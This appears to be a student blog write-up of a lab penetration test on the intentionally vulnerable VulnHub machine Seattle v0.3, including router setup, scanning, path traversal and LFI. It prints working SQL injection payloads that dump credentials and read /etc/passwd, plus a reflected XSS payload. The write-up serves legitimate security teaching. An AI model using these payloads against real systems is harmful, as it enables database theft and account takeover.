PROJECT BASED LEARNING
SEATTLE: V0.3 (Vulnhub)
What is Seattle: V0.3?
Graceful’s VulnVM is web application running on a virtual machine, it’s designed to simulate a simple eCommerce style website which is purposely vulnerable to a number of well know security issues commonly seen in web applications.
Source Machine:
https://vulnhub.com/entry/seattle-v03,145/ or Seattle: v0.3 ~ VulnHub
Main Page
Network Machine (Mikrotik)
Source machine:
https://mikrotik.com/download (X86)
Topic of PBL: Vulnerability Assessment on Server Web
Learning outcomes:
- Understand the importance of network and operating system security
- Understand the importance of application and service security
- Understand the importance of patch management
- Understand and be able to perform vurnerability assessment as part of ethical hacking
- Understand web application and database (sql) security
Constraints:
The majority of VMs on the internet will get an IP address from the DHCP server, therefore it must be installed in the VM as well as a DHCP server
Tools:
1. - Virtualbox
2. - Machine (vulnhub)
3. - Kali Linux/Others (assessment tool)
Topologi:
Networking step:
A. Download
1. Download that machine in Mikrotik
2. Install and running that machine in VM or others, do not forget to change network either
For setting Network
A. Nat => to get internet
B. Host-only Adapter =>for winbox configuration
- IP => 192.168.56.1
- Subnet mask => 255.255.255.0
C. Internal Network => to share internet connection from Router OS Mikrotik
3. In winbox there are 3 interfaces
Interface
4. IP Accepted = 192.168.10.10/24
IP where get from the internet = 10.0.2.15/24 (Use NAT)
5. For DHCP Client Interface which used is NAT(Internet)
IP -> DHCP Client
6. For DHCP Server to give the IP as automatic form the interface whis used for LAN1(sharing Network)
IP -> DHCP Server
7. To share internet for IP which has been shared by DHCP Server
IP -> Firewall -> NAT
8. Ping at Winbox which has already been connected to internet
New terminal
9. Open Kali linux or other Linux Machine and we get the IP from the Router OS that has made, it is 192.168.10.8
Pentesting step:
A. Connecting
1. Login on the Machine of "Seattle", do not forget to input login and password, then type "ifconfig" to get an ipaddress:
2. Then do ping on Linux, if successfull connnected, you will be seeing the web, type ipaddress in your url browser
B. Information Gathering
Information gathering is the process of collecting information about a target, such as a computer system, network, or organization. This information can be used to identify vulnerabilities or weaknesses that can be exploited by an attacker.
- Whatweb
WhatWeb is an open-source web scanner that can identify and recognize all the web technologies available on a target website. It can also be used to gather information about a website, such as its software that used,email address and technology stack.
We found software and technology stack that website used like PHP version, Apache version,etc
C. Enumeration
Enumeration is the process of gathering specific information about a target, such as the operating system, services running, and open ports. This information can be used to further assess the target's security posture.
- Dirsearch
Dirsearch is an open-source directory scanner tool that can be used to find hidden directories and files on websites. It uses a brute-force technique to try all possible combinations of characters to find directories and files that are not visible to ordinary users.
here, we found some hidden directories or paths on website that can be accessed
Path Traversal
High (9.8)
Path traversal, also known as directory traversal or ../ (dot dot slash), is a type of exploit attack that allows an attacker to access directories and files that they should not be able to access.
We got File Passwd
result
- Dirbuster
Dirbuster is a powerful tool that can be used to find valuable information on websites. It is easy to use and can be customized to meet your specific needs.
Exposed Administrative Interface
Medium (5.3)
An exposed administrative interface, also known as an exposed admin panel or exposed management console, is an interface that allows users to manage and configure a system or application.
Path: /admin
url: 192.168.56.107/account.php?login=session
LFI Attack
High (9.8)
A Local File Inclusion (LFI) attack is a type of exploit attack that allows an attacker to run malicious code or access local files on a web server. This attack works by exploiting a vulnerability in the input validation used by a web application to process user requests.
We got File
Inside it, i take a look a few codes and saw the path of /connection.php, so i opened it and got config.php
- Nmap
Nmap is an open-source network scanning tool used to discover hosts and services on a computer network. Nmap can be used for a variety of purposes, including:
Host discovery: Nmap can be used to find active hosts on a network.
Service discovery: Nmap can be used to find services running on active hosts.
Operating system detection: Nmap can be used to determine the operating system running on active hosts.
Vulnerability scanning: Nmap can be used to identify security vulnerabilities on active hosts.
Note:
-sV = Services running on the ports
-sC = Run some standart scripts
-Pn = Consider the host alive
Note:
-A = Perform an aggressive scan of the network
-sS = Sends a SYN packet to the target port
B. Vulnerability Assessment
- Nikto
open-source web server scanner that can be used to scan web servers for vulnerabilities
C. Information Disclosure
Information disclosure is a term used to describe a situation in which sensitive or confidential information is accidentally revealed. This information can include things like personal data, financial information, or corporate secrets.
Url: 192.168.56.107/info.php
PHP INFORMATION
Note : opened the page which allows us to run various vulnerabilities to read the PHP source code pages
- allow_url_fopen=On - which implies that LFI may be possible.
- allow_url_include=Off - which implies that RFI may not be possible.
- display_errors=Off - which implies that errors aren’t displayed in output.
- include_path: .:/usr/share/pear:/usr/share/php - LFI only possible for these paths however.
D. SQL Injection (Blind)
Blind SQL Injection is a type of SQL Injection attack in which the attacker cannot see the results of the SQL query that is executed. This can happen for a number of reasons, such as HTTP Response, SQL Query execute. etc
We will check vuln in path /products.php in Vinyl tab
Intercape with Burpsuite tool and save into file.txt
Search database name with sqlmap
Then, search table name
Dump password with sqlmap
SQL Injection (Error-Based) is a type of SQL Injection attack in which the attacker uses the error messages generated by the database server to extract information from the database.
Example Payload
Vinyl Path
192.168.56.107/products.php?type=1
In vinyl tab we found possible SQLInjection
If we open the product detail and try to add ' in there (url) like this;
192.168.56.107/details.php?prod=1'&type=1
We try another payload
type=1+UNION+SELECT+1,2,3,4,5--+-
So, we can start extracting data from there,so let's Extract!!!
try another payload
type=1+UNION+SELECT+1,2,version(),4,5--+=
try another payload again
http://192.168.56.107/products.php?type=1+UNION+SELECT+1,2,database(),4,5--+=
I use this reference to get more vulnerable
Payload:
type=1+UNION+SELECT+1,2,table_name,4,5+FROM+information_schema.tables+WHERE+table_schema=database()--+-
We use another payload:
type=1+UNION+SELECT+1,2,column_name,4,5+FROM+information_schema.columns+WHERE+table_schema=database()--+-
Finally, We found three of them very interesting, id, username and password
Knowing the tables and the columns of the seattle database, we can get the username and password
Use this payload to get username and password
type=1+UNION+SELECT+1,2,username,4,5+FROM+tblMembers--+-
type=1+UNION+SELECT+1,2,password,4,5+FROM+tblMembers--+-
Username
admin@seattlesounds.net
Password
Assasin1
Then, We login with that Credential Account
Note: We can do the same thing with that Injection on /clothing path and get the same credentials :)
Read File with SQL Injection
We can also Inject the passwd from SQL Injection and get the same credential like Path Traversal
Payload:
type=2+UNION+SELECT+1,2,LOAD_FILE('/etc/passwd'),4,5--+-
Reflected XSS (Admin)
Reflected cross-site scripting (XSS) is a type of XSS attack in which the malicious code is reflected back to the victim's browser in the response to a user action. This can happen when a web application takes input from a user and then includes that input in the response without properly sanitizing it.
Reflected XSS discovered in author parameter in blog php file:
In URL http://192.168.56.107/blog.php?author=
add payload
"><script>alert("whateveryouwant")</script>'
WE GOT THEM:)
Reflected XSS (User)
I wondered what if i do xss attack as user or guest account not as admin account, so i decided to try XSS attack with the same way with url:
http://192.168.56.108/blog.php
In that path, i was wondering, what if i add parameter "author=" with no admin account, so i added that parameter into url like this;
http://192.168.56.108/blog.php?author=
So. i try do xss with the same way like this, and this successfully :)
Example 01
Conclusion :
As we pentesting as long as we get some vuln, Here are some vuln on machine of Seattle-v0.3;
- SQL Injection (Error-based)
- SQL Injection (Blind)
- Reflected Cross-Site Scripting
- Stored Cross-Site Scripting
- Insecure Direct-Object Reference
- Username Enumeration
- Path Traversal
- Exposed phpinfo()
- Exposed Administrative Interface
- Weak Admin Credentials
Stay Healthy and Keep Strong!!!
No comments:
Post a Comment